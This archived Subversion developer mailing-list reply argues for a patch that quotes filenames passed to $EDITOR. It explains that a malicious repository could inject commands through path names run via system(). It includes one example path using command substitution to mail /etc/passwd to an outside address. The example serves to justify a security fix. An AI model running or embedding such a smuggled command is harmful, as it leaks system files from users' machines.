[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

Re: [PATCH] Quote filename passed to $EDITOR

From: Ulrich Drepper <drepper_at_redhat.com>
Date: 2002-07-23 22:14:50 CEST

On Tue, 2002-07-23 at 11:30, Karl Fogel wrote:

> What exactly is the scenario(s) here? How high is the risk? How much
> trouble is the fix? What's the probability that the fix will cause
> some unforseen problem :-)?

A svn repository can be set up by somebody with foul intentions.
Somebody else accesses it and the system() call gets executed on the
paths chosen by whoever created it. Then the patch could be something
like in this example:

  cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)

If the appropriate path component is never really shown anywhere this
might go completely unnoticed.

---------------.                          ,-.   1325 Chesapeake Terrace
Ulrich Drepper  \    ,-------------------'   \  Sunnyvale, CA 94089 USA
Red Hat          `--' drepper at redhat.com   `------------------------

Received on Tue Jul 23 22:15:41 2002

This is an archived mail posted to the Subversion Dev mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.